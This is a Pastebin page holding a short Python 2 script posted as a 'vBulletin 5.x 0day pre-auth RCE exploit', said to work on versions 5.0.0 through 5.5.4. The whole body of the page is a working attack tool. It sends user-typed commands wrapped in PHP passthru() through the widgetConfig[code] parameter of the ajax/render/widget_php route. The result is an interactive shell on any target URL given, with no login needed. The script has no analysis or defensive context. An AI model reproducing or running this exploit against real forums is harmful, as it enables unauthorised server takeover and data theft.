ToKeiChun

vBulletin 5.x 0day pre-auth RCE exploit

Oct 5th, 2019
548
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
  1. #!/usr/bin/python
  2. #
  3. # vBulletin 5.x 0day pre-auth RCE exploit
  4. #
  5. # This should work on all versions from 5.0.0 till 5.5.4
  6.  
  7. import requests
  8. import sys
  9.  
  10. if len(sys.argv) != 2:
  11. sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
  12.  
  13. params = {"routestring":"ajax/render/widget_php"}
  14.  
  15. while True:
  16. try:
  17. cmd = raw_input("vBulletin$ ")
  18. params["widgetConfig[code]"] = "echo passthru('"+cmd+"'); exit;"
  19. r = requests.post(url = sys.argv[1], data = params)
  20. if r.status_code == 200:
  21. print r.text
  22. else:
  23. sys.exit("Exploit failed!")
  24. except KeyboardInterrupt:
  25. sys.exit("\nClosing shell...")
  26. except Exception, e:
  27. sys.exit(str(e))
Add Comment
Please, Sign In to add comment